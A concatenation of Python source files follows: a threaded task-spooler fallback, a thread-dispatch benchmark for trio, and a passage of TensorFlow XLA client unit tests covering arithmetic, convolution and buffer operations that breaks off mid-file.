logger.warning("uwsgi module not found, tasks will run in threads")
# Create a threaded version of the spooler
def spool(pass_arguments=True):
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
if settings.DISABLE_TASKS:
return
if settings.MULTI_THREAD:
# Run process in separate thread.
logger.info(f"new thread for function f{func} {args} {kwargs}")
t = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
t.start()
else:
func(*args, **kwargs)
inner.spool = inner
return inner
# Gains an attribute called spool that runs the function in the background.
return outer
# Create a threaded version of the timer
def timer(secs, **kwargs):
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
if settings.DISABLE_TASKS:
return
# The loop repeats the timer.
def loop():
ticker = threading.Event()
while not ticker.wait(secs):
func(*args, **kwargs)
if settings.MULTI_THREAD:
# Run process in separate thread, once.
logger.info(f"new time thread for function f{func} {args} {kwargs}")
t = threading.Thread(target=loop, daemon=True)
t.start()
else:
func(*args, **kwargs)
inner.timer = inner
return inner
# Gains an attribute called timer that will run the function periodically.
return outer
|
thread-dispatch-bench.py
|
# Estimate the cost of simply passing some data into a thread and back, in as
# minimal a fashion as possible.
#
# This is useful to get a sense of the *lower-bound* cost of
# trio.to_thread.run_sync
import threading
from queue import Queue
import time
COUNT = 10000
def worker(in_q, out_q):
while True:
job = in_q.get()
out_q.put(job())
def main():
in_q = Queue()
out_q = Queue()
t = threading.Thread(target=worker, args=(in_q, out_q))
t.start()
while True:
start = time.monotonic()
for _ in range(COUNT):
in_q.put(lambda: None)
out_q.get()
end = time.monotonic()
print("{:.2f} µs/job".format((end - start) / COUNT * 1e6))
main()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class ComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(unittest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
root = c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(ComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486): re-enable when shape check is resolved
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
